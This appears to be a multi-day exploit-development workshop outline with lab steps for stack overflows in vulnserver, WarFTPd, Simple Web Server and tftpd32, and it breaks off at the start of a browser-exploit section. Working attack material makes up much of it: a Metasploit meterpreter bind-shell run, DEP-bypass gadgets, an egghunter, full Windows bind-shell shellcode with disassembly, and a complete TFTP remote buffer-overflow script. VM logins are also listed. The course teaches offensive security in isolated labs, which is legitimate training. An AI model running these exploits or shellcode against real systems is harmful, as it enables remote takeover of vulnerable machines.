San Diego Exploit Development 2018

San Diego Exploit Development 2018

Whitepapers of interest:
https://www.sans.org/reading-room/whitepapers/firewalls/tactical-data-diodes-industrial-automation-control-systems-36057


#######################
# VMs for this course #
#######################
https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
    username: workshop
    password: password

https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user:      infosecaddicts
pass:      infosecaddicts

You don't have to, but you can do the updates in the Win7 VM (yes, it is a lot of updates).


#######################################################
# Files you may find helpful for learning Exploit Dev #
#######################################################
https://s3.amazonaws.com/secureninja/files/slides.zip
https://s3.amazonaws.com/secureninja/files/ExploitDevProcessDocs.zip


#####################################
# Quick Stack Based Buffer Overflow #
#####################################

- You can download everything you need for this exercise (except netcat) from the link below
https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip

- Extract this zip file to your Desktop

- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:

---------------------------Type This-----------------------------------

nc localhost 9999
-----------------------------------------------------------------------

- In the new command prompt window where you ran nc type:
HELP

- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option edit with notepad++

- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.


- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.

- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338

4-count-chars-to-EIP.py
- In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
- so we search for 8Co9 in the string of nonrepeating chars and count the distance to it

5-2006char-eip-check.py
- In this script we check to see if our math is correct in our calculation of the distance to EIP by overwriting EIP with 42424242

6-jmp-esp.py
- In this script we overwrite EIP with a JMP ESP (6250AF11) inside of essfunc.dll

7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444

8 - Take a look at the file vulnserv.rb and place it in your Ubuntu host via SCP or copy it and paste the code into the host.


---------------------------Type This-----------------------------------

cd /home/infosecaddicts/toolz/metasploit/modules/exploits/windows/misc

vi vulnserv.rb    (paste the code into this file)


cd ~/toolz/metasploit

./msfconsole


use exploit/windows/misc/vulnserv
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST CHANGEME-TO-YOUR-WIN7-IP
set RPORT 9999
exploit

-----------------------------------------------------------------------------------
Day 1 Homework:
Watch the following videos and take notes for questions tomorrow.

http://www.securitytube.net/video/1389
http://www.securitytube.net/video/1398
http://www.securitytube.net/video/1399


-----------------------------------------------------------------------------------------------------------------------

#########
# Day 2 #
#########
You can download the Secure Ninja courseware here:
https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx


Morning challenge:
Your task is to convert the SLMail 5.5 exploit (https://www.exploit-db.com/exploits/646) to the multiple script format used yesterday with vulnserver.


Day 2 Homework:
Watch the following videos and take notes for questions tomorrow.
http://www.securitytube.net/video/1406
http://www.securitytube.net/video/1407
http://www.securitytube.net/video/1408


-----------------------------------------------------------------------------------------------------------------------

#########
# Day 3 #
#########
You can download the Secure Ninja courseware here:
https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx


Morning challenge:
Your task is to convert the Easy File Sharing Web Server 7.2 exploit (https://www.exploit-db.com/exploits/39008/) to the multiple script format used with vulnserver and SLMail on your Windows 7 host machine.

NOTE: If you did the SMail exploit on Windows XP yesterday, then please do it on Windows 7 today prior to doing the Easy File Sharing Web Server 7.2 exploit.


Day 3 Homework:
Watch the following videos and take notes for questions tomorrow.
https://s3.amazonaws.com/secureninja/videos/0006-Intro-to-Mona.mp4
https://s3.amazonaws.com/secureninja/videos/0007-Mona-continued.mp4
https://s3.amazonaws.com/secureninja/videos/0014-DEP-Basics.mp4
https://s3.amazonaws.com/secureninja/videos/0015-Bypassing-DEP-using-ROP-chains.mp4


#########
# Day 4 #
#########
You can download the Secure Ninja courseware here:
https://s3.amazonaws.com/secureninja/files/SecureNinja+-+64-bit+Windows+Exploit+Development+Course.docx


Morning challenge:
Your task is to convert the Konica Minolta exploit (https://www.exploit-db.com/exploits/39215/, https://www.exploit-db.com/exploits/38252/, https://www.exploit-db.com/exploits/38254/) to the multiple script format used with vulnserver, SLMail, and Easy File Sharing Web Server 7.2 on your Windows 7 host machine.


-------------------------------------------------------------------
All of the content

You can download the Exploit Dev VMs from the links below:
https://s3.amazonaws.com/infosecaddictsvirtualmachines/XPSP3-ED-Target.zip
https://s3.amazonaws.com/infosecaddictsvirtualmachines/Strategicsec-XP-ED-Attack-Host.zip
user:	Administrator
pass: 	strategicsec

https://s3.amazonaws.com/infosecaddictsvirtualmachines/StrategicsecUbuntu-v3.zip
user:	strategicsec
pass: 	strategicsec


https://s3.amazonaws.com/infosecaddictsvirtualmachines/asterisk.zip
user: exploitlab
pass: exploitlab


All of the exploit script listed below is contained in the following zip file. Please download it to your XP-ED-Attack-Host VM. The password for the zip file is: joemccray

https://s3.amazonaws.com/infosecaddictsfiles/ED-Workshop-Files.zip

###########################
# Lab 1a: Stack Overflows #
###########################

	#################################
	# Start WarFTPd			        #
	# Start WinDBG			        #
	# Press F6			            #
	# Attach to war-ftpd.exe	    #
	#################################

---------------------------Type This-----------------------------------

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a


python warftpd1.py | nc XPSP3-ED-Target-IP 21
-----------------------------------------------------------------------

	At WINDBG prompt
	“r” to show registers or “alt+4”

---------------------------Type This-----------------------------------

	dd esp
-----------------------------------------------------------------------

---------------------------Type This-----------------------------------

python warftpd2.py | nc XPSP3-ED-Target-IP 21
-----------------------------------------------------------------------


	At WINDBG prompt
	“r” to show registers or “alt+4”

---------------------------Type This-----------------------------------

	dd esp
-----------------------------------------------------------------------

	Eip: 32714131
	esp: affd58		(71413471)

	Now we need to SSH into the StrategicSec Ubuntu host

---------------------------Type This-----------------------------------

	cd /home/strategicsec/toolz/metasploit/tools

	ruby pattern_offset.rb 32714131
	485

	ruby pattern_offset.rb 71413471
	493
-----------------------------------------------------------------------

	Distance to EIP is: 		485
	Relative position of ESP is: 	493

	RET – POP EIP
	RET 4 – POP EIP and shift ESP down by 4 bytes

---------------------------Type This-----------------------------------

	cd /home/strategicsec/toolz/metasploit/
	./msfpescan -j ESP DLLs/xpsp3/shell32.dll
-----------------------------------------------------------------------

		0x7c9c167d push esp; retn 0x304d
		0x7c9d30d7 jmp esp < - how about we use this one
		0x7c9d30eb jmp esp
		0x7c9d30ff jmp esp


		warftpd3.py with Notepad++
		Fill in the appropriate values
		Distance to EIP
		Address of JMP ESP


---------------------------Type This-----------------------------------

python warftpd3.py | nc XPSP3-ED-Target-IP 21

	0:003> dd eip
	0:003> dd esp
-----------------------------------------------------------------------


	Mention bad characters
	No debugger


---------------------------Type This-----------------------------------

python warftpd4.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444
-----------------------------------------------------------------------


###########################################
# Lab 1b: Stack Overflows with DEP Bypass #
###########################################

Reboot your target host and choose the "2nd" option for DEP.


cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1b


---------------------------Type This-----------------------------------

python warftpd1.py | nc XPSP3-ED-Target-IP 21

	At WINDBG prompt
	“r” to show registers or “alt+4”

	dd esp


python warftpd2.py | nc XPSP3-ED-Target-IP 21


	At WINDBG prompt
	“r” to show registers or “alt+4”
	dd esp
-----------------------------------------------------------------------

	Eip: 32714131
	esp: affd58		(71413471)

	Now we need to SSH into the StrategicSec Ubuntu host

---------------------------Type This-----------------------------------

	cd /home/strategicsec/toolz/metasploit/tools

	ruby pattern_offset.rb 32714131
	485

	ruby pattern_offset.rb 71413471
	493


cd /home/strategicsec/toolz/metasploit/tools

ruby pattern_offset.rb 32714131

cd /home/strategicsec/toolz/metasploit/

./msfpescan -j ESP DLLs/xpsp3/shell32.dll | grep 0x7c9d30d7


python warftpd3.py | nc XPSP3-ED-Target-IP 21

	0:003> dd eip
	0:003> dd esp

INT3s - GOOD!!!!!!!


python warftpd4.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444
-----------------------------------------------------------------------


strategicsec....exploit no workie!!!!


Why????????? DEP!!!!!!!!!!!!!


Let's look through ole32.dll for the following instructions:

mov al,0x1
ret 0x4

We need to set al to 0x1 for the LdrpCheckNXCompatibility routine.


---------------------------Type This-----------------------------------

./msfpescan -D -r "\xB0\x01\xC2\x04" DLLs/xpsp3/ole32.dll
-----------------------------------------------------------------------

[DLLs/xpsp3/ole32.dll]
0x775ee00e b001c204
0x775ee00e      mov al, 1
0x775ee010      ret 4


Then we need to jump to the LdrpCheckNXCompatibility routine in
ntdll.dll that disables DEP.


Inside of ntdll.dll we need to find the following instructions:

CMP AL,1
PUSH 2
POP ESI
JE ntdll.7


---------------------------Type This-----------------------------------

./msfpescan -D -r "\x3C\x01\x6A\x02\x5E\x0F\x84" DLLs/xpsp3/ntdll.dll
-----------------------------------------------------------------------

[DLLs/xpsp3/ntdll.dll]
0x7c91cd24 3c016a025e0f84
0x7c91cd24      cmp al, 1
0x7c91cd26      push 2
0x7c91cd28      pop esi
0x7c91cd29      jz 7


This set of instructions makes sure that AL is set to 1, 2 is pushed
on the stack then popped into ESI.


---------------------------Type This-----------------------------------

dep = "\x0e\xe0\x5e\x77"+\
"\xff\xff\xff\xff"+\
"\x24\xcd\x91\x7c"+\
"\xff\xff\xff\xff"+\
"A"*0x54


python warftpd5.py | nc XPSP3-ED-Target-IP 21

nc XPSP3-ED-Target-IP 4444
-----------------------------------------------------------------------


########################################
# Lab 2a: Not Enough Space (Egghunter) #
########################################

---------------------------Type This-----------------------------------

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\sws_skeleton
-----------------------------------------------------------------------

SWS - SIMPLE WEB SERVER
-----------------------

Running SWS on Strategicsec-XP-ED-Target-VM
Start > Programs > Simple Web Server (it's in the middle somewhere)
Red icon in system tray
Double click it
- it will pop up a menu
- select "start"
- dialog box shows starting params - port 82

WinDBG
- attach to "server.exe"

---------------------------Type This-----------------------------------

python sws1.py | nc XPSP3-ED-Target-IP 82


python sws2.py | nc XPSP3-ED-Target-IP 82


SSH into the Ubuntu host (user: strategicsec/pass: strategicsec)
cd /home/strategicsec/toolz/metasploit/tools
ruby pattern_offset.rb 41356841				<------- You should see that EIP is at 225
ruby pattern_offset.rb 68413668				<------- You should see that ESP is at 229

-----------------------------------------------------------------------


EGGHUNTER:
----------

"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
          ^^^^^^^^^^^^^^^^
               ABBA
                                         JMP ESP
                                        /
                                       /
GET /AAAAAAAAAAA...225...AAAAAAAAAA[ EIP ]$egghunter HTTP/1.0
User-Agent: ABBAABBA LARGE SHELLCODE (Alpha2 encoded)


-----sws3.py-----
#!/usr/bin/python2

import os # for output setting
import sys
import struct # for pack function

# turn off output buffer and set binary mode
sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb', 0)


pad = "A" * 225        # distance to EIP
eip = 0x7e429353       # replace EIP to point to "jmp esp" from user32.dll

egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
egghunter += "\xEF\xB8\x41\x42\x42\x41\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

shellcode = "\xCC" * 700

buf = "GET /"
buf += pad + struct.pack('<I', eip) + egghunter
buf += " HTTP/1.0\r\n"
buf += "User-Agent: ABBAABBA"
buf += shellcode
buf += " HTTP/1.0\r\n"

sys.stdout.write(buf)
-----

############################################
# Lab 2b: Not Enough Space (Negative Jump) #
############################################

---------------------------Type This-----------------------------------

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2a\modjk_skeleton

-----------------------------------------------------------------------

[pad = distance_to_seh - len(shellcode) ] [ shellcode] [jmp4 = "\x90\x90\xEB\x04"] [eip (pop pop ret)] [jmp_min = "\xE9\x98\xEF\xFF\xFF"]

									^
1 ----------------------1 overflow the buffer---------------------------|

									^		             ^
									|
									2 ----jump over seh record---|

												     ^				^
												     |
												     3--POP 2 words off stack---|

																	^
4 -----negative jump into NOPs - then into shellcode -----------------------------------------------------------------------------------|


#########################################
# Lab 2c: Not Enough Space (Trampoline) #
#########################################

---------------------------Type This-----------------------------------

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab2c\tftpd_skeleton
-----------------------------------------------------------------------


On the Strategicsec-XP-ED-Target-VM VM

- open a command prompt
- c:\software\tftpd32
- run tftpd32.exe
- UDP port 69
(socket code is already in the scripts)


On your attack host please install:


  NASM - Netwide Assembler


-----------------------------------------------------------------------------------------------------------------


We want to generate the shellcode (BIND SHELL on Port 4444)
- No restricted characters
- Encoder: NONE

Create a Python file called dumpshellcode.py

---
#!/usr/bin/python2

import os
import sys
import struct


# win32_bind -  EXITFUNC=seh LPORT=4444 Size=317 Encoder=None http://metasploit.com
shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
shellcode += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
shellcode += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
shellcode += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
shellcode += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
shellcode += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
shellcode += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
shellcode += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
shellcode += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
shellcode += "\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
shellcode += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
shellcode += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
shellcode += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
shellcode += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
shellcode += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
shellcode += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
shellcode += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
shellcode += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
shellcode += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
shellcode += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"

sys.stdout.write(shellcode)
---


python dumpshell.py > bindshell.bin

copy bindshellcode.bin into the "c:\Program Files\nasm" directory


Here we saved the raw shellcode generated by metasploit into a file called bindshell.bin
317 bindshell.bin

---------------------------Type This-----------------------------------

C:\Program Files\nasm>ndisasm -b 32 bindshell.bin
-----------------------------------------------------------------------

00000000  FC                cld
00000001  6AEB              push byte -0x15
00000003  4D                dec ebp
00000004  E8F9FFFFFF        call dword 0x2
00000009  60                pushad
0000000A  8B6C2424          mov ebp,[esp+0x24]
0000000E  8B453C            mov eax,[ebp+0x3c]
00000011  8B7C0578          mov edi,[ebp+eax+0x78]
00000015  01EF              add edi,ebp
00000017  8B4F18            mov ecx,[edi+0x18]
0000001A  8B5F20            mov ebx,[edi+0x20]
0000001D  01EB              add ebx,ebp
0000001F  49                dec ecx
00000020  8B348B            mov esi,[ebx+ecx*4]
00000023  01EE              add esi,ebp
00000025  31C0              xor eax,eax
00000027  99                cdq
00000028  AC                lodsb
00000029  84C0              test al,al
0000002B  7407              jz 0x34
0000002D  C1CA0D            ror edx,0xd
00000030  01C2              add edx,eax
00000032  EBF4              jmp short 0x28
00000034  3B542428          cmp edx,[esp+0x28]
00000038  75E5              jnz 0x1f
0000003A  8B5F24            mov ebx,[edi+0x24]
0000003D  01EB              add ebx,ebp
0000003F  668B0C4B          mov cx,[ebx+ecx*2]
00000043  8B5F1C            mov ebx,[edi+0x1c]
00000046  01EB              add ebx,ebp
00000048  032C8B            add ebp,[ebx+ecx*4]
0000004B  896C241C          mov [esp+0x1c],ebp
0000004F  61                popad
00000050  C3                ret
00000051  31DB              xor ebx,ebx
00000053  648B4330          mov eax,[fs:ebx+0x30]
00000057  8B400C            mov eax,[eax+0xc]
0000005A  8B701C            mov esi,[eax+0x1c]
0000005D  AD                lodsd
0000005E  8B4008            mov eax,[eax+0x8]
00000061  5E                pop esi
00000062  688E4E0EEC        push dword 0xec0e4e8e
00000067  50                push eax
00000068  FFD6              call esi
0000006A  6653              push bx
0000006C  66683332          push word 0x3233
00000070  687773325F        push dword 0x5f327377
00000075  54                push esp
00000076  FFD0              call eax
00000078  68CBEDFC3B        push dword 0x3bfcedcb
0000007D  50                push eax
0000007E  FFD6              call esi                     PART 1
00000080  5F                pop edi
00000081  89E5              mov ebp,esp
00000083  6681ED0802        sub bp,0x208
00000088  55                push ebp
00000089  6A02              push byte +0x2
0000008B  FFD0              call eax
0000008D  68D909F5AD        push dword 0xadf509d9
00000092  57                push edi
00000093  FFD6              call esi
00000095  53                push ebx
00000096  53                push ebx
--------------------------------------------CUTCUTCUTCUTCUT----8<---8<---8<---
00000097  53                push ebx
00000098  53                push ebx
00000099  53                push ebx
0000009A  43                inc ebx
0000009B  53                push ebx
0000009C  43                inc ebx
0000009D  53                push ebx                       PART 2
0000009E  FFD0              call eax
000000A0  6668115C          push word 0x5c11
000000A4  6653              push bx
000000A6  89E1              mov ecx,esp
000000A8  95                xchg eax,ebp
000000A9  68A41A70C7        push dword 0xc7701aa4
000000AE  57                push edi
000000AF  FFD6              call esi
000000B1  6A10              push byte +0x10
000000B3  51                push ecx
000000B4  55                push ebp
000000B5  FFD0              call eax
000000B7  68A4AD2EE9        push dword 0xe92eada4
000000BC  57                push edi
000000BD  FFD6              call esi
000000BF  53                push ebx
000000C0  55                push ebp
000000C1  FFD0              call eax
000000C3  68E5498649        push dword 0x498649e5
000000C8  57                push edi
000000C9  FFD6              call esi
000000CB  50                push eax
000000CC  54                push esp
000000CD  54                push esp
000000CE  55                push ebp
000000CF  FFD0              call eax
000000D1  93                xchg eax,ebx
000000D2  68E779C679        push dword 0x79c679e7
000000D7  57                push edi
000000D8  FFD6              call esi
000000DA  55                push ebp
000000DB  FFD0              call eax
000000DD  666A64            push word 0x64
000000E0  6668636D          push word 0x6d63
000000E4  89E5              mov ebp,esp
000000E6  6A50              push byte +0x50
000000E8  59                pop ecx
000000E9  29CC              sub esp,ecx
000000EB  89E7              mov edi,esp
000000ED  6A44              push byte +0x44
000000EF  89E2              mov edx,esp
000000F1  31C0              xor eax,eax
000000F3  F3AA              rep stosb
000000F5  FE422D            inc byte [edx+0x2d]
000000F8  FE422C            inc byte [edx+0x2c]
000000FB  93                xchg eax,ebx
000000FC  8D7A38            lea edi,[edx+0x38]
000000FF  AB                stosd
00000100  AB                stosd
00000101  AB                stosd
00000102  6872FEB316        push dword 0x16b3fe72
00000107  FF7544            push dword [ebp+0x44]
0000010A  FFD6              call esi
0000010C  5B                pop ebx
0000010D  57                push edi
0000010E  52                push edx
0000010F  51                push ecx
00000110  51                push ecx
00000111  51                push ecx
00000112  6A01              push byte +0x1
00000114  51                push ecx
00000115  51                push ecx
00000116  55                push ebp
00000117  51                push ecx
00000118  FFD0              call eax
0000011A  68ADD905CE        push dword 0xce05d9ad
0000011F  53                push ebx
00000120  FFD6              call esi
00000122  6AFF              push byte -0x1
00000124  FF37              push dword [edi]
00000126  FFD0              call eax
00000128  8B57FC            mov edx,[edi-0x4]
0000012B  83C464            add esp,byte +0x64
0000012E  FFD6              call esi
00000130  52                push edx
00000131  FFD0              call eax
00000133  68F08A045F        push dword 0x5f048af0
00000138  53                push ebx
00000139  FFD6              call esi
0000013B  FFD0              call eax


part1 = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
part1 += "\xf5\xad\x57\xff\xd6\x53\x53"


part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"


STACK SHIFTER:
prepend = "\x81\xC4\xFF\xEF\xFF\xFF"  # add esp, -1001h
prepend += "\x44"                     # inc esp


---- final script ----

#!/usr/bin/python2
#TFTP Server remote Buffer Overflow

import sys
import socket
import struct

if len(sys.argv) < 2:
	sys.stderr.write("Usage: tftpd.py <host>\n")
	sys.exit(1)

target = sys.argv[1]
port = 69

eip = 0x7e429353         # jmp esp in USER32.DLL

part1 += "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
part1 += "\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
part1 += "\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
part1 += "\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
part1 += "\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
part1 += "\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
part1 += "\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
part1 += "\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
part1 += "\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
part1 += "\xf5\xad\x57\xff\xd6\x53\x53"

part2 = "\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
part2 += "\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
part2 += "\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
part2 += "\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
part2 += "\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
part2 += "\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
part2 += "\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
part2 += "\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
part2 += "\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
part2 += "\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
part2 += "\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0"

prepend = "\x81\xC4\xFF\xEF\xFF\xFF"  			# add esp, -1001h
prepend += "\x44"                     			# inc esp

buf = "\x00\x01"         				# receive command

buf += "\x90" * (256 - len(part2))    			# NOPs
buf += part2                               		# shellcode part 2
buf += struct.pack('<I', eip)                       	# EIP (JMP ESP)
buf += prepend                              		# stack shifter
buf += part1                                		# shellcode part 1
buf += "\xE9" + struct.pack('<i', -380)       		# JMP -380
buf += "\x00"                                		# END

# print buf

# buf = "\x00\x01"         				# receive command

# buf += "A" * 300 + "\x00"

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

try:
	sock.connect((target, port))
	sock.sendall(buf)
except Exception as e:
	sys.stderr.write("Cannot send to "+str(target)+" : "+str(port)+" : "+str(e)+"!\n")
finally:
	sock.close()
	sys.stderr.write("Sent.\n")


-----------------------------------------------------------------------------------------------------------------


How does all of this actually work


Total shellcode length: 	315

				Part1:	150
				Part2:	165


NOPS * (256 - 165)

91 NOPS + (165 bytes shellcode p2) + JMP ESP (4 bytes) + Stack Shift (-1000) + (150 bytes shellcode p1) + (neg jmp -380)
			|			|					|
			256			260					150 (410)		|
  |<------------------------------------------------------------------------------------------------------------|
 Jump to the
 30 byte mark


############################
# Lab 3: Browsers Exploits #
############################

---------------------------Type This-----------------------------------

cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab3\ffvlc_skeleton
-----------------------------------------------------------------------

Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000

<object id=quicktime clsid="999-999999-99-99999">
  <param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
</object>

var buf = "";
for(i = 0; i < 50000; i++)
   buf += "A";
var myobject = document.getElementById("quicktime");
myobject.url = buf;

YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!

- Browsers (Flash)
- PDF
- MS Office / OOo

VLC smb:// exploit
------------------

EXPLOIT VECTOR

